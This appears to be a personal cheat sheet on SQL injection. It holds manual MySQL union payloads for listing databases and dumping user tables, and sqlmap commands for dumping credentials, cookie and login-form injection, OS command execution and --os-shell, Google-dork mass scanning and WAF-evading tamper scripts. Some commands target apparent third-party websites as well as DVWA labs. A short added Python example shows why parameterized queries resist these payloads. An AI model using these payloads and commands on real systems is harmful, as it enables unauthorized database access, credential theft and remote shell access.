Basics
1' order by 2 -- /*used to guess the number of columns in the query
1' and 1=2 union select user(),database(),--
1' and 1=2 union select user(),version(), -- /*use the user(), database() and version() functions to get database information
1'and 1=2 union select 1,@@global.version_compile_os from mysql.user -- /*get operating system information
1' and ord(mid(user(),1,1))=114 -- /*test the privileges of the database connection user
1' and 1=2 union select 1,schema_name from information_schema.schemata -- /*list all database names
1' and exists(select * from users) -- /*guess the table name
1' and exists(select first_name from users) -- /*guess the column name
1' and 1=2 union select first_name,last_name from users -- /*guess the column contents
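Why the payloads above work against a concatenated query and not against a bound parameter, as an added example that is not part of the original notes. It assumes an in-memory SQLite database with constructed rows standing in for the MySQL-backed DVWA users table; make_db, lookup_concat, lookup_bound and outcome are hypothetical names.

```python
import sqlite3

# Payloads from the list above; ORDER_BY_3 is the same probe with the next index.
ORDER_BY_2 = "1' order by 2 -- "
ORDER_BY_3 = "1' order by 3 -- "
UNION_DUMP = "1' and 1=2 union select first_name,last_name from users -- "

def make_db():
    # Constructed sample rows in a table shaped like the DVWA users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("1", "admin", "admin"), ("2", "Gordon", "Brown"),
                    ("3", "Pablo", "Picasso")])
    return db

def lookup_concat(db, user_id):
    # Vulnerable: input is spliced into the SQL text, so a quote ends the literal
    # and everything after it is parsed as SQL.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return db.execute(sql).fetchall()

def lookup_bound(db, user_id):
    # Hardened: input is bound as a value and never reaches the SQL parser.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

def outcome(lookup, db, user_id):
    # Return ("rows", n) or ("error", message) so both paths can be compared.
    try:
        return ("rows", len(lookup(db, user_id)))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    db = make_db()
    for name, payload in [("plain id", "1"), ("order by 2", ORDER_BY_2),
                          ("order by 3", ORDER_BY_3), ("union", UNION_DUMP)]:
        print(f"{name:12} concat={outcome(lookup_concat, db, payload)} "
              f"bound={outcome(lookup_bound, db, payload)}")
```

With the concatenated query, the order by probe succeeds for index 2 and errors for index 3, and the union payload returns every row; with the bound parameter each payload is compared as a literal user_id and matches nothing.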
Testing with sqlmap:
I. General steps
sqlmap -u http://111 --dbs get the databases
sqlmap -u http://111 -D databasename --tables get the table names
sqlmap -u http://111 -D databasename -T tablename --columns get the columns
sqlmap -u http://111 -D databasename -T tablename -C id,user,password --dump get the column contents
II. Cookie injection
sqlmap -u "http://www.ntjx.org/jsj/DownloadShow.asp" --cookie "id=9" --table --level 2 inject through the cookie
sqlmap -u "http://www.ntjx.org/jsj/DownloadShow.asp" --cookie "id=9" --columns --level 2
III. POST login form injection
1. Can be combined with Burp Suite
sqlmap.py -r search-test.txt -p tfUPass
2. sqlmap -u http://testasp.vulnweb.com/Login.asp --forms
3. sqlmap -u http://testasp.vulnweb.com/Login.asp --data "tfUName=1&tfUPass=1"
IV. Command execution
sqlmap -u http://testasp.vulnweb.com/Login.asp --os-cmd=ipconfig
sqlmap -u http://testasp.vulnweb.com/Login.asp --os-shell
V. Pseudo-static URL injection
sqlmap -u http://sfle.y.com/index/40*.html -D databasename --tables get the table names
VI. Request delay
sqlmap -u http://sfle.y.com/index/40*.html --delay 1 visit the normal page at intervals
sqlmap -u http://sfle.y.com/index/40*.html --safe-freq 20
VII. Search-based injection scanning
sqlmap -g inurl:php?id=1
VIII. Bypassing a WAF
sqlmap -u http://192.168.159.1/news.php?id=1 -v 3 --dbs --batch --tamper "space2morehash.py"
space2hash.py base64encode.py charencode.py
F:\Pentest\software\测试软件\sqlmap>python sqlmap.py -u "http://192.168.1.204/dvwa/vulnerabilities/sqli/index.php?Submit=Submit#" --data "id=1" --cookie "security=low; PHPSESSID=2ct43q8u003g4fjm1o6jrjmbc7"
./sqlmap -u "http://192.168.0.4/dvwa/vulnerabilities/sqli_blind/?id='&Submit=Submit" --cookie="security=low;PHPSESSID=s92rvhil24kuqfqiugavahbp53" --dbs
root@snow:/home/tools/sqlmap# python sqlmap.py -u "http://192.168.1.8/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --dump -C "user,password" -T "users" -D "dvwa" --cookie="PHPSESSID=jpmr41rhv6ljlidrquhc4ajm11; security=low"
sqlmap plugins
http://www.nbhkdz.com/read/c29b1ebe40070202252880f7.html
linux
Video
http://v.ku6.com/show/-Xto249em6PeIFD0fe0Z3w...html?from=my
Usage
http://www.cnblogs.com/im404/p/3505894.html
http://hi.baidu.com/sy_chengzhe/item/c9d332fab406a442932af203
http://www.hack44.cn/search.asp?word=%D0%A1%B5%CF&m=2&ChannelID=0&page=3
http://drops.wooyun.org/tips/143
http://www.2cto.com/Article/201209/153909.html
http://drops.wooyun.org/tips/401
http://hanhp.blog.51cto.com/8475416/1351106
DVWA injection
http://www.loveautumn.com/text/sqlmap1.html
http://blog.sina.com.cn/s/blog_8cc77f5e0101lo6c.html
http://blog.csdn.net/v0dga/article/details/7545066
http://www.freebuf.com/articles/1000.html
http://www.loveautumn.com/text/sqlmap_tamper.html complete tamper script list
***
http://www.freebuf.com/articles/4184.html
http://apriliscc.blog.163.com/blog/static/22747009320139309351453/